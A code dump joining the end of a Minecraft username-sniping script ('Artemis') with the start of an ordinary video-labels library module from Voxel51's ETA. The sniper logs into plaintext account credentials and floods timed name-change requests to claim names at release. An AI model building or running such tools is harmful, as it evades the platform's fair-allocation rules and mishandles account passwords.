"PUT /minecraft/profile/name/TEST HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer " + "TEST_TOKEN\r\n\r\n",
"utf-8"))
ssock.recv(10000).decode('utf-8')
delays.append(time.time() - start)
return (sum(delays) / len(delays) * 1000 / 2)
def countdown_time(count):
for i in range(int(count), 0, -1):
minutes, seconds = divmod(i, 60)
if minutes > 59:
hours, minutes = divmod(minutes, 60)
print(f"Generating Connection & Threads 😴 ~~ {'0' if hours < 10 else ''}{hours}:{'0' if minutes < 10 else ''}{minutes}:{'0' if seconds < 10 else ''}{seconds}", end="\r")
elif minutes:
print(f"Generating Connection & Threads 😫 ~~ {'0' if minutes < 10 else ''}{minutes}:{'0' if seconds < 10 else ''}{seconds} ", end="\r")
else:
print(f"Generating Connection & Threads 👀 ~~ {seconds}s ", end="\r")
time.sleep(1)
# Check acc type
def isGC(bearer) -> bool:
return requests.get("https://api.minecraftservices.com/minecraft/profile/namechange",
headers={"Authorization": f"Bearer {bearer}"}).status_code == 404
# EP Requests
def req(acc):
# With closes socket connection
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('api.minecraftservices.com', 443))
context = ssl.create_default_context()
ss = context.wrap_socket(
s, server_hostname='api.minecraftservices.com')
ss.send(bytes(f'{acc["payload"]}\r\n\r\n', 'utf-8'))
output.append((ss.recv(423), time.time()))
# On Success
def success_true(token_list):
t.join()
threads = threading.active_count() - 1
while threads:
threads = threading.active_count() - 1
print(f"Waiting for {threads} thread(s) to finish...")
time.sleep(0.5) # Wait until threads terminate
# Sort Times
output.sort(key=lambda time: time[1])
for outs in output:
status_code = outs[0].decode("utf-8")[9:12]
if status_code.isnumeric() and int(status_code) == 200:
print(f"[{Fore.GREEN}{status_code}{Fore.RESET}] ~ {datetime.datetime.utcfromtimestamp(outs[1]).strftime('%S.%f')}")
for token in token_list:
headers = {"Authorization": f"Bearer {token.get('bearer')}"}
username = requests.get(
"https://api.minecraftservices.com/minecraft/profile",
headers=headers,
).json()["name"]
if username == target_name:
print(f"🎉 Sniped {Fore.MAGENTA}{target_name}{Fore.RESET} 🎉")
skin_change = requests.post(
"https://api.minecraftservices.com/minecraft/profile/skins",
json={
"variant": "classic",
"url": "https://i.imgur.com/8nuxlIk.png",
},
headers=headers,
)
if skin_change.status_code == 200:
print(f"{Fore.MAGENTA}Successfully delivered skin change{Fore.RESET}")
else:
print(f"{Fore.YELLOW}Failed to deliver skin change{Fore.RESET}")
try:
webhook = DiscordWebhook(url=WEBHOOK_URL, rate_limit_retry=True)
embed = DiscordEmbed(title="NameMC", url=f'https://namemc.com/search?q={target_name}',
description=f"**Sniped `{target_name}` :ok_hand:**", color=12282401)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/944338449140420690/eaf9e293982fe84b1bb5ff08f40a17f9.webp?size=1024')
webhook.add_embed(embed)
webhook.execute()
print(f"{Fore.MAGENTA}Successfully executed webhook{Fore.RESET}")
except requests.exceptions.MissingSchema:
print(f"{Fore.YELLOW}No webhook url specified{Fore.RESET}")
except requests.exceptions.ConnectionError:
print(f"{Fore.YELLOW}Failed to execute webhook{Fore.RESET}")
else:
print(f"[{Fore.RED}{status_code}{Fore.RESET}] ~ {datetime.datetime.utcfromtimestamp(outs[1]).strftime('%S.%f')}")
if __name__ == "__main__":
try:
# remove duplicates
with open("accs.txt", "r+") as file:
accs = "\n".join(set(file.read().splitlines()))
file.seek(0)
file.truncate()
file.write(accs)
# Start main
print(fade.purplepink(f"""
########## # ######### ###### ##########
# ## ######### ####### ########## # # # #
# # # # # # # ########## #
# # # # # # ######## # #
# # # ########## # # # # #
# ######### # # # # ##
# # # ######## #### ##
a r t e m i s"""))
print("Blessed by the Goddess - Artemis\n")
target_name = input("% Name ~> ")
while not target_name:
target_name = input("% Name ~> ")
auto_offset = auto_ping(5)
offset = float(input(f"\n% Offset [{auto_offset:.2f}ms] ~> ") or auto_offset)
droptime = requests.get(f"http://api.star.shopping/droptime/{target_name}", headers={"User-Agent": "Sniper"}).json()
if droptime.get("unix"):
droptime = droptime["unix"] - (offset / 1000)
else:
print(f"\n{Fore.RED}ERROR: \"{droptime['error'].capitalize()}\"{Fore.RESET}")
droptime = input(f"\n% {target_name} Unix Droptime ~> {Fore.RESET}")
while not droptime:
droptime = input(f"\n% {target_name} Unix Droptime ~> {Fore.RESET}")
droptime = int(droptime)
with open("accs.txt") as file:
for line in file.read().splitlines():
if not line.strip():
continue
splitter = line.split(":")
if len(splitter) != 2:
print(f"{Fore.LIGHTYELLOW_EX}Invalid account ~ \"{line}\"{Fore.RESET}")
continue
email, password = splitter
try:
if (msresp := msmcauth.login(email, password).access_token) and isGC(msresp):
# Gc auth
print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [GC]")
accdata.append({"reqamount": 2, "bearer": msresp,
"payload": f"POST /minecraft/profile HTTP/1.1\r\nHost: api.minecraftservices.com\r\nprofileName: {target_name}\r\nAuthorization: Bearer {msresp}"})
else:
# Microsoft auth
if not nameChangeAllowed(msresp):
print(f"{Fore.YELLOW}{email} cannot namechange{Fore.RESET}")
continue
accdata.append({"reqamount": 4, "bearer": msresp,
"payload": f"PUT /minecraft/profile/name/{target_name} HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer {msresp}"})
print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [MS]")
except:
# Mojang auth
auth = requests.post("https://authserver.mojang.com/authenticate",
json={"username": email, "password": password})
try:
auth_result = auth.json()
if auth.status_code == 200 and auth_result:
if not nameChangeAllowed(auth_result['accessToken']):
print(f"{Fore.YELLOW}{email} cannot namechange{Fore.RESET}")
continue
accdata.append({"reqamount": 4, "bearer": auth_result['accessToken'],
"payload": f"PUT /minecraft/profile/name/{target_name} HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer {auth_result['accessToken']}"})
print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [MJ]")
else:
raise Exception
except:
print(f"{Fore.YELLOW}[{auth.status_code}] ~ {email} failed to authenticate{Fore.RESET}")
if not accdata:
sys.exit(f"{Fore.RED}No accounts valid...{Fore.RESET}")
# Prepare Sleep
try:
countdown_time((droptime - time.time()) - 8)
except ValueError:
pass
#Generating Threads Before Droptime
for acc_data in accdata:
threads = [threading.Thread(target=req, args=(acc_data,)) for _ in range(acc_data.get("reqamount"))]
time.sleep(droptime - time.time())
for t in threads:
t.start()
success_true(accdata)
finally:
input("\n\n\nPress enter to exit...")
|
video.py | """
Core tools and data structures for working with videos.
Notes::
[frame numbers] ETA uses 1-based indexing for all frame numbers
[image format] ETA stores images exclusively in RGB format. In contrast,
OpenCV stores its images in BGR format, so all images that are read or
produced outside of this library must be converted to RGB. This
conversion can be done via `eta.core.image.bgr_to_rgb()`
Copyright 2017-2021, Voxel51, Inc.
voxel51.com
"""
# pragma pylint: disable=redefined-builtin
# pragma pylint: disable=unused-wildcard-import
# pragma pylint: disable=wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import *
from future.utils import iteritems, itervalues
# pragma pylint: enable=redefined-builtin
# pragma pylint: enable=unused-wildcard-import
# pragma pylint: enable=wildcard-import
from copy import deepcopy
import errno
import logging
import os
from subprocess import Popen, PIPE
import threading
import cv2
import dateutil.parser
import numpy as np
from sortedcontainers import SortedDict
import eta.core.data as etad
import eta.core.events as etae
from eta.core.frames import FrameLabels, FrameLabelsSchema
import eta.core.frameutils as etaf
import eta.core.gps as etag
import eta.core.image as etai
import eta.core.labels as etal
import eta.core.objects as etao
import eta.core.serial as etas
import eta.core.utils as etau
logger = logging.getLogger(__name__)
#
# The file extensions of supported video files. Use LOWERCASE!
#
# In practice, any video that ffmpeg can read will be supported. Nonetheless,
# we enumerate this list here so that the ETA type system can verify the
# extension of a video provided to a pipeline at build time.
#
# This list was taken from https://en.wikipedia.org/wiki/Video_file_format
# with additions from other places on an ad-hoc basis
#
SUPPORTED_VIDEO_FILE_FORMATS = {
".3g2",
".3gp",
".m2ts",
".mts",
".amv",
".avi",
".f4a",
".f4b",
".f4p",
".f4v",
".flv",
".m2v",
".m4p",
".m4v",
".mkv",
".mov",
".mp2",
".mp4",
".mpe",
".mpeg",
".mpg",
".mpv",
".m2ts",
".mts",
".nsv",
".ogg",
".ogv",
".qt",
".rm",
".rmvb",
".svi",
".ts",
".tsv",
".tsa",
".vob",
".webm",
".wmv",
".yuv",
}
def is_video_mime_type(filepath):
"""Determines whether the given file has a `video` MIME type.
Args:
filepath: the path to the file
Returns:
True/False
"""
return etau.guess_mime_type(filepath).startswith("video")
def is_supported_video(path):
"""Determines whether the given filepath points to a supported video.
Args:
path: the path to a video, like `/path/to/video.mp4` or
`/path/to/frames-%05d.jpg`
Returns:
True/False if the path refers to a supported video type
"""
return is_supported_video_file(path) or is_supported_image_sequence(path)
def is_supported_video_file(path):
"""Determines whether the given filepath points to a supported video file
type.
Args:
path: the path to a video file, like `/path/to/video.mp4`
Returns:
True/False if the path refers to a supported video file type
"""
return os.path.splitext(path)[1].lower() in SUPPORTED_VIDEO_FILE_FORMATS
def is_supported_image_sequence(path):
"""Determines whether the given filepath points to a supported image
sequence type.
Args:
path: the path to an image sequence, like `/path/to/frames-%05d.jpg`
Returns:
True/False if the path refers to a supported video file type
"""
try:
_ = path % 1
return etai.is_supported_image(path)
except TypeError:
return False
def is_same_video_file_format(path1, path2):
"""Determines whether the video files have the same supported format.
Args:
path1: the path to a video
path2: the path to a video
Returns:
True/False
"""
return (
is_supported_video(path1)
and os.path.splitext(path1)[1] == os.path.splitext(path2)[1]
)
def is_valid_video_file(path):
"""Determines if the given video file is valid, i.e., it has a supported
type and can be read by our system.
This method does not support videos represented as image sequences (i.e.,
it will return False for them).
Args:
path: the path to a video file
Returns:
True/False if the video is valid
"""
if not is_supported_video_file(path):
return False
try:
with FFmpegVideoReader(path):
return True
except etau.ExecutableRuntimeError:
return False
def glob_videos(dir_):
"""Returns an iterator over all supported video files in the directory."""
return etau.multiglob(
*SUPPORTED_VIDEO_FILE_FORMATS, root=os.path.join(dir_, "*")
)
class VideoMetadata(etas.Serializable):
"""Class encapsulating metadata about a video.
Attributes:
start_time: (optional) a datetime describing the start (world) time of
the video
frame_size: the [width, height] of the video frames
frame_rate: the frame rate of the video
total_frame_count: the total number of frames in the video
duration: the duration of the video, in seconds
size_bytes: the size of the video file on disk, in bytes
mime_type: the MIME type of the video
encoding_str: the encoding string for the video
gps_waypoints: (optional) a GPSWaypoints instance describing the GPS
coordinates for the video
"""
def __init__(
self,
start_time=None,
frame_size=None,
frame_rate=None,
total_frame_count=None,
duration=None,
size_bytes=None,
mime_type=None,
encoding_str=None,
gps_waypoints=None,
):
"""Creates a VideoMetadata instance.
Args:
start_time: (optional) a datetime describing the start (world) time
of the video
frame_size: the [width, height] of the video frames
frame_rate: the frame rate of the video
total_frame_count: the total number of frames in the video
duration: the duration of the video, in seconds
size_bytes: the size of the video file on disk, in bytes
mime_type: the MIME type of the video
encoding_str: the encoding string for the video
gps_waypoints: (optional) a GPSWaypoints instance describing the
GPS coordinates for the video
"""
self.start_time = start_time
self.frame_size = frame_size
self.frame_rate = frame_rate
self.total_frame_count = total_frame_count
self.duration = duration
self.size_bytes = size_bytes
self.mime_type = mime_type
self.encoding_str = encoding_str
self.gps_waypoints = gps_waypoints
@property
def aspect_ratio(self):
"""The aspect ratio of the video."""
width, height = self.frame_size
return width * 1.0 / height
@property
def has_gps(self):
"""Whether this object has GPS waypoints."""
return self.gps_waypoints is not None
def get_timestamp(self, frame_number=None, world_time=None):
"""Gets the timestamp for the given point in the video.
Exactly one keyword argument must be supplied.
Args:
frame_number: the frame number of interest
world_time: a datetime describing the world time of interest
Returns:
the timestamp (in seconds) in the video
"""
if world_time is not None:
timestamp = etaf.world_time_to_timestamp(
world_time, self.start_time
)
return etaf.timestamp_to_frame_number(
timestamp, self.duration, self.total_frame_count
)
return etaf.frame_number_to_timestamp(
frame_number, self.total_frame_count, self.duration
)
def get_frame_number(self, timestamp=None, world_time=None):
"""Gets the frame number for the given point in the video.
Exactly one keyword argument must be supplied.
Args:
timestamp: the timestamp (in seconds or "HH:MM:SS.XXX" format) of
interest
world_time: a datetime describing the world time of interest
Returns:
the frame number in the video
"""
if world_time is not None:
return etaf.world_time_to_frame_number(
world_time,
self.start_time,
self.duration,
self.total_frame_count,
)
return etaf.timestamp_to_frame_number(
timestamp, self.duration, self.total_frame_count
)
def get_gps_location(
self, frame_number=None, timestamp=None, world_time=None
):
"""Gets the GPS location at the given point in the video.
Exactly one keyword argument must be supplied.
Nearest neighbors is used to interpolate between waypoints.
Args:
frame_number: the frame number of interest
timestamp: the timestamp (in seconds or "HH:MM:SS.XXX" format) of
interest
world_time: a datetime describing the absolute (world) time of
interest
Returns:
the (lat, lon) at the given frame in the video, or None if the
video has no GPS waypoints
"""
if not self.has_gps:
return None
if world_time is not None:
timestamp = self.get_timestamp(world_time=world_time)
if timestamp is not None:
frame_number = self.get_frame_number(timestamp=timestamp)
return self.gps_waypoints.get_location(frame_number)
def attributes(self):
"""Returns the list of class attributes that will be serialized."""
_attrs = [
"start_time",
"frame_size",
"frame_rate",
"total_frame_count",
"duration",
"size_bytes",
"mime_type",
"encoding_str",
"gps_waypoints",
]
return [a for a in _attrs if getattr(self, a) is not None]
@classmethod
def build_for(cls, video_path, verbose=False):
"""Builds a VideoMetadata instance for the given video.
Args:
video_path: the path to the video
verbose: whether to generously log the process of extracting the
video metadata. By default, this is False
Returns:
a VideoMetadata instance
"""
vsi = VideoStreamInfo.build_for(video_path, verbose=verbose)
metadata = cls.from_stream_info(vsi)
if verbose:
logger.info("Extracted video metadata: %s", str(metadata))
return metadata
@classmethod
def from_stream_info(cls, stream_info):
"""Builds a VideoMetadata from a VideoStreamInfo.
Args:
stream_info: a VideoStreamInfo
Returns:
a VideoMetadata
"""
return cls(
frame_size=stream_info.frame_size,
frame_rate=stream_info.frame_rate,
total_frame_count=stream_info.total_frame_count,
duration=stream_info.duration,
size_bytes=stream_info.size_bytes,
mime_type=stream_info.mime_type,
encoding_str=stream_info.encoding_str,
)
@classmethod
def from_dict(cls, d):
"""Constructs a VideoMetadata from a JSON dictionary."""
start_time = d.get("start_time", None)
if start_time is not None:
start_time = dateutil.parser.parse(start_time)
gps_waypoints = d.get("gps_waypoints", None)
if isinstance(gps_waypoints, dict):
gps_waypoints = etag.GPSWaypoints.from_dict(gps_waypoints)
elif isinstance(gps_waypoints, list):
#
# This supports a list of GPSWaypoint instances rather than a
# serialized GPSWaypoints instance. for backwards compatability
#
points = [etag.GPSWaypoint.from_dict(p) for p in gps_waypoints]
gps_waypoints = etag.GPSWaypoints(points=points)
return cls(
start_time=start_time,
frame_size=d.get("frame_size", None),
frame_rate=d.get("frame_rate", None),
total_frame_count=d.get("total_frame_count", None),
duration=d.get("duration", None),
size_bytes=d.get("size_bytes", None),
mime_type=d.get("mime_type", None),
encoding_str=d.get("encoding_str", None),
gps_waypoints=gps_waypoints,
)
class VideoFrameLabels(FrameLabels):
"""FrameLabels for a specific frame of a video.
VideoFrameLabels are spatial concepts that describe a collection of
information about a specific frame in a video. VideoFrameLabels can have
frame-level attributes, object detections, event detections, and
segmentation masks.
Attributes:
frame_number: the frame number
mask: (optional) a segmentation mask for the frame
mask_index: (optional) a MaskIndex describing the semantics of the
segmentation mask
attrs: an AttributeContainer of attributes of the frame
objects: a DetectedObjectContainer of objects in the frame
keypoints: a KeypointsContainer of keypoints in the frame
polylines: a PolylineContainer of polylines in the frame
events: a DetectedEventContainer of events in the frame
"""
@classmethod
def from_image_labels(cls, image_labels, frame_number):
"""Constructs a VideoFrameLabels from an ImageLabels.
Args:
image_labels: an ImageLabels
frame_number: the frame number
Returns:
a VideoFrameLabels
"""
return cls(
frame_number=frame_number,
mask=image_labels.mask,
mask_index=image_labels.mask_index,
attrs=image_labels.attrs,
objects=image_labels.objects,
keypoints=image_labels.keypoints,
polylines=image_labels.polylines,
events=image_labels.events,
)
@classmethod
def from_frame_labels(cls, frame_labels):
"""Constructs a VideoFrameLabels from a FrameLabels.
Args:
frame_labels: a FrameLabels
Returns:
a VideoFrameLabels
"""
return cls(
frame_number=frame_labels.frame_number,
mask=frame_labels.mask,
mask_index=frame_labels.mask_index,
attrs=frame_labels.attrs,
objects=frame_labels.objects,
keypoints=frame_labels.keypoints,
polylines=frame_labels.polylines,
events=frame_labels.events,
)
class VideoLabels(
etal.Labels,
etal.HasLabelsSchema,
etal.HasLabelsSupport,
etal.HasFramewiseView,
etal.HasSpatiotemporalView,
):
"""Class encapsulating labels for a video.
VideoLabels are spatiotemporal concepts that describe the content of a
video. VideoLabels can have video-level attributes that apply to the entire
video, frame-level attributes, frame-level object detections, frame-level
keypoints/polylines/polygons/masks, frame-level event detections,
spatiotemporal objects, and spatiotemporal events.
Note that the VideoLabels class implements the `HasFramewiseView` and
`HasSpatiotemporalView` mixins. This means that all VideoLabels instances
can be rendered in both *framewise* and *spatiotemporal* format. Converting
between these formats is guaranteed to be lossless and idempotent.
In framewise format, VideoLabels store all information at the frame-level
in VideoFrameLabels. In particular, the following invariants will hold:
- The `attrs` field will be empty. All video-level attributes will be
stored as frame-level `Attribute`s in `frames` with
`constant == True`
- The `objects` field will be empty. All video objects will be stored
stored as frame-level `DetectedObject`s in the VideoFrameLabels
corresponding to the frames in which they are observed
- The `events` field will be empty. All video events will be stored
stored as frame-level `DetectedEvent`s in the VideoFrameLabels
corresponding to the frames in which they are observed
In spatiotemporal format, VideoLabels store all possible information in
the highest-available video construct. In particular, the following
invariants will hold:
- The `attrs` fields of all VideoFrameLabels will contain only
non-constant `Attribute`s. All constant attributes will be upgraded
to video-level attributes in the top-level `attrs` field
- The `objects` fields of all VideoFrameLabels will be empty. All
objects will be stored as `VideoObject`s in the top-level `objects`
field. Detections for objects with `index`es will be collected in a
single VideoObject, and each DetectedObject without an index will be
given its own VideoObject. Additionally, all constant attributes of
`DetectedObject`s will be upgraded to object-level attributes in
their parent VideoObject
- The `events` fields of all VideoFrameLabels will be empty. All
events will be stored as `VideoEvent`s in the top-level `events`
field. Detections for events with `index`es will be collected in a
single VideoEvent, and each DetectedEvent without an index will be
given its own VideoEvent. Additionally, all objects (and their
constant attributes) within events will be upgraded to `VideoObject`s
using the strategy described in the previous bullet point
Attributes:
filename: (optional) the filename of the video
metadata: (optional) a VideoMetadata of metadata about the video
support: a FrameRanges instance describing the support of the labels
mask_index: (optional) a MaskIndex describing the semantics of all
segmentation masks in the video
attrs: an AttributeContainer of video-level attributes
frames: a SortedDict mapping frame numbers to VideoFrameLabels
objects: a VideoObjectContainer of objects
events: a VideoEventContainer of events
schema: (optional) a VideoLabelsSchema describing the video's schema
"""
def __init__(
self,
filename=None,
metadata=None,
support=None,
mask_index=None,
attrs=None,
frames=None,
objects=None,
events=None,
schema=None,
):
"""Creates a VideoLabels instance.
Args:
filename: (optional) the filename of the video
metadata: (optional) a VideoMetadata of metadata about the video
support: (optional) a FrameRanges instance describing the frozen
support of the labels
mask_index: (optional) a MaskIndex describing the semantics of all
segmentation masks in the video
attrs: (optional) an AttributeContainer of video-level attributes
frames: (optional) a dictionary mapping frame numbers to
VideoFrameLabels
objects: (optional) a VideoObjectContainer of objects
events: (optional) a VideoEventContainer of events
schema: (optional) a VideoLabelsSchema to enforce on the video
"""
self.filename = filename
self.metadata = metadata
self.mask_index = mask_index
self.attrs = attrs or etad.AttributeContainer()
self.frames = SortedDict(frames or {})
self.objects = objects or etao.VideoObjectContainer()
self.events = events or etae.VideoEventContainer()
etal.HasLabelsSchema.__init__(self, schema=schema)
etal.HasLabelsSupport.__init__(self, support=support)
def __getitem__(self, frame_number):
"""Gets the VideoFrameLabels for the given frame number, or an empty
if no VideoFrameLabels exists.
Args:
frame_number: the frame number
Returns:
a VideoFrameLabels
"""
return self.get_frame(frame_number)
def __setitem__(self, frame_number, frame_labels):
"""Sets the VideoFrameLabels for the given frame number.
If a VideoFrameLabels already exists for the frame, it is overwritten.
Args:
frame_number: the frame number
frame_labels: a VideoFrameLabels
"""
frame_labels.frame_number = frame_number
self.add_frame(frame_labels, overwrite=True)
def __delitem__(self, frame_number):
"""Deletes the VideoFrameLabels for the given frame number.
Args:
frame_number: the frame number
"""
self.delete_frame(frame_number)
def __iter__(self):
"""Returns an iterator over the frames with VideoFrameLabels.
The frames are traversed in sorted order.
Returns:
an iterator over frame numbers
"""
return iter(self.frames)
def iter_attributes(self):
"""Returns an iterator over the video-level attributes in the video.
Returns:
an iterator over `Attribute`s
"""
return iter(self.attrs)
def iter_video_objects(self):
"""Returns an iterator over the `VideoObject`s in the video.
Returns:
an iterator over `VideoObject`s
"""
return iter(self.objects)
def iter_video_events(self):
"""Returns an iterator over the `VideoEvent`s in the video.
Returns:
an iterator over `VideoEvent`s
"""
return iter(self.events)
def iter_frames(self):
"""Returns an iterator over the VideoFrameLabels in the video.
The frames are traversed in sorted order.
Returns:
an iterator over VideoFrameLabels
"""
return itervalues(self.frames)
@property
def framewise_renderer_cls(self):
"""The LabelsFrameRenderer used by this class."""
return VideoLabelsFrameRenderer
@property
def spatiotemporal_renderer_cls(self):
"""The LabelsSpatiotemporalRenderer used by this class."""
return VideoLabelsSpatiotemporalRenderer
@property
def has_filename(self):
"""Whether the video has a filename."""
return self.filename is not None
@property
def has_metadata(self):
"""Whether the video has metadata."""
return self.metadata is not None
@property
def has_mask_index(self):
"""Whether the video has a video-wide frame segmentation mask index."""
return self.mask_index is not None
@property
def has_video_attributes(self):
"""Whether the video has at least one video-level attribute."""
return bool(self.attrs)
@property
def has_frame_attributes(self):
"""Whether the video has at least one frame-level attribute."""
for frame_number in self:
if self[frame_number].has_frame_attributes:
return True
return False
@property
def has_attributes(self):
"""Whether the video has video- or frame-level attributes."""
return self.has_video_attributes or self.has_frame_attributes
@property
def has_video_objects(self):
"""Whether the video has at least one VideoObject."""
return bool(self.objects)
@property
def has_detected_objects(self):
"""Whether the video has at least one frame-level DetectedObject."""
for frame_labels in self.iter_frames():
if frame_labels.has_objects:
return True
return False
@property
def has_objects(self):
"""Whether the video has at least one VideoObject or DetectedObject."""
return self.has_video_objects or self.has_detected_objects
@property
def has_video_events(self):
"""Whether the video has at least one VideoEvent."""
return bool(self.events)
@property
def has_detected_events(self):
"""Whether the video has at least one frame-level DetectedEvent."""
for frame_labels in self.iter_frames():
if frame_labels.has_events:
return True
return False
@property
def has_events(self):
"""Whether the video has at least one VideoEvent or DetectedEvent."""
return self.has_video_events or self.has_detected_events
@property
def has_keypoints(self):
"""Whether the video has at least one frame with keypoints."""
for frame_labels in self.iter_frames():
if frame_labels.has_keypoints:
return True
return False
@property
def has_polylines(self):
"""Whether the video has at least one frame with polylines."""
for frame_labels in self.iter_frames():
if frame_labels.has_polylines:
return True
return False
@property
def has_frame_labels(self):
"""Whether the video has at least one VideoFrameLabels."""
return bool(self.frames)
@property
def is_empty(self):
"""Whether the video has no labels of any kind."""
return not (
self.has_video_attributes
or self.has_frame_attributes
or self.has_video_objects
or self.has_video_events
or self.has_frame_labels
)
@property
def num_frames(self):
"""The number of frames with VideoFrameLabels."""
return len(self.frames)
def has_frame(self, frame_number):
"""Determines whether this object contains a VideoFrameLabels for the
given frame number.
Args:
frame_number: the frame number
Returns:
True/False
"""
return frame_number in self.frames
def get_frame(self, frame_number):
"""Gets the VideoFrameLabels for the given frame number, or an empty
VideoFrameLabels if one does not yet exist.
Args:
frame_number: the frame number
Returns:
a VideoFrameLabels
"""
try:
return self.frames[frame_number]
except KeyError:
return VideoFrameLabels(frame_number=frame_number)
def delete_frame(self, frame_number):
"""Deletes the VideoFrameLabels for the given frame number.
Args:
frame_number: the frame number
"""
del self.frames[frame_number]
def get_frame_numbers_with_labels(self):
"""Returns a sorted list of all frames with VideoFrameLabels.
Returns:
a list of frame numbers
"""
return list(self.frames.keys())
def get_frame_numbers_with_masks(self):
"""Returns a sorted list of frames with frame-level masks.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_mask]
def get_frame_numbers_with_attributes(self):
"""Returns a sorted list of frames with one or more frame-level
attributes.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_frame_attributes]
def get_frame_numbers_with_objects(self):
"""Returns a sorted list of frames with one or more `DetectedObject`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_objects]
def get_frame_numbers_with_keypoints(self):
"""Returns a sorted list of frames with frame-level `Keypoints`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_keypoints]
def get_frame_numbers_with_polylines(self):
"""Returns a sorted list of frames with frame-level `Polyline`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_polylines]
def get_frame_numbers_with_events(self):
"""Returns a sorted list of frames with one or more `DetectedEvent`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_events]
def get_object_indexes(self):
"""Returns the set of `index`es of all objects in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
obj_indexes = self.objects.get_indexes()
obj_indexes.update(self.events.get_object_indexes())
for frame_labels in self.iter_frames():
obj_indexes.update(frame_labels.get_object_indexes())
return obj_indexes
def offset_object_indexes(self, offset):
"""Adds the given offset to all objects with `index`es in the video.
Args:
offset: the integer offset
"""
self.objects.offset_indexes(offset)
self.events.offset_object_indexes(offset)
for frame_labels in self.iter_frames():
frame_labels.offset_object_indexes(offset)
def clear_object_indexes(self):
"""Clears the `index` of all objects in the video."""
self.objects.clear_indexes()
self.events.clear_object_indexes()
for frame_labels in self.iter_frames():
frame_labels.clear_object_indexes()
def get_keypoints_indexes(self):
"""Returns the set of `index`es of all keypoints in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
keypoints_indexes = set()
for frame_labels in self.iter_frames():
keypoints_indexes.update(frame_labels.get_keypoints_indexes())
return keypoints_indexes
def offset_keypoints_indexes(self, offset):
"""Adds the given offset to all keypoints with `index`es in the video.
Args:
offset: the integer offset
"""
for frame_labels in self.iter_frames():
frame_labels.offset_keypoints_indexes(offset)
def clear_keypoints_indexes(self):
"""Clears the `index` of all keypoints in the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_keypoints_indexes()
def get_polyline_indexes(self):
"""Returns the set of `index`es of all polylines in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
polyline_indexes = set()
for frame_labels in self.iter_frames():
polyline_indexes.update(frame_labels.get_polyline_indexes())
return polyline_indexes
def offset_polyline_indexes(self, offset):
"""Adds the given offset to all polylines with `index`es in the video.
Args:
offset: the integer offset
"""
for frame_labels in self.iter_frames():
frame_labels.offset_polyline_indexes(offset)
def clear_polyline_indexes(self):
"""Clears the `index` of all polylines in the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_polyline_indexes()
def get_event_indexes(self):
"""Returns the set of `index`es of all events in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
event_indexes = self.events.get_indexes()
for frame_labels in self.iter_frames():
event_indexes.update(frame_labels.get_event_indexes())
return event_indexes
def offset_event_indexes(self, offset):
"""Adds the given offset to all events with `index`es in the video.
Args:
offset: the integer offset
"""
self.events.offset_indexes(offset)
for frame_labels in self.iter_frames():
frame_labels.offset_event_indexes(offset)
def clear_event_indexes(self):
"""Clears the `index` of all events in the video."""
self.events.clear_indexes()
for frame_labels in self.iter_frames():
frame_labels.clear_event_indexes()
def add_video_attribute(self, attr):
"""Adds the given video-level attribute to the video.
Args:
attr: an Attribute
"""
self.attrs.add(attr)
def add_video_attributes(self, attrs):
"""Adds the given video-level attributes to the video.
Args:
attrs: an AttributeContainer
"""
self.attrs.add_container(attrs)
def add_frame(self, frame_labels, frame_number=None, overwrite=True):
"""Adds the frame labels to the video.
Args:
frame_labels: a FrameLabels instance
frame_number: an optional frame number. If not specified, the
FrameLabels must have its `frame_number` set
overwrite: whether to overwrite any existing VideoFrameLabels
instance for the frame or merge the new labels. By default,
this is True
"""
self._add_frame_labels(frame_labels, frame_number, overwrite)
def add_frame_attribute(self, attr, frame_number):
"""Adds the given frame-level attribute to the video.
Args:
attr: an Attribute
frame_number: the frame number
"""
self._ensure_frame(frame_number)
self.frames[frame_number].add_attribute(attr)
def add_frame_attributes(self, attrs, frame_number):
"""Adds the given frame-level attributes to the video.
Args:
attrs: an AttributeContainer
frame_number: the frame number
"""
self._ensure_frame(frame_number)
self.frames[frame_number].add_attributes(attrs)
def add_object(self, obj, frame_number=None):
"""Adds the object to the video.
Args:
obj: a VideoObject or DetectedObject
frame_number: (DetectedObject only) the frame number. If omitted,
the DetectedObject must have its `frame_number` set
"""
if isinstance(obj, etao.DetectedObject):
self._add_detected_object(obj, frame_number)
else:
self.objects.add(obj)
def add_objects(self, objects, frame_number=None):
"""Adds the objects to the video.
Args:
objects: a VideoObjectContainer or DetectedObjectContainer
frame_number: (DetectedObjectContainer only) the frame number. If
omitted, the DetectedObjects must have their `frame_number` set
"""
if isinstance(objects, etao.DetectedObjectContainer):
self._add_detected_objects(objects, frame_number)
else:
self.objects.add_container(objects)
def add_event(self, event, frame_number=None):
"""Adds the event to the video.
Args:
event: a VideoEvent or DetectedEvent
frame_number: (DetectedEvent only) the frame number. If omitted,
the DetectedEvent must have its `frame_number` set
"""
if isinstance(event, etae.DetectedEvent):
self._add_detected_event(event, frame_number)
else:
self.events.add(event)
def add_events(self, events, frame_number=None):
"""Adds the events to the video.
Args:
events: a VideoEventContainer or DetectedEventContainer
frame_number: (DetectedEventContainer only) the frame number. If
omitted, the `DetectedEvent`s must have their `frame_number`s
set
"""
if isinstance(events, etae.DetectedEventContainer):
self._add_detected_events(events, frame_number)
else:
self.events.add_container(events)
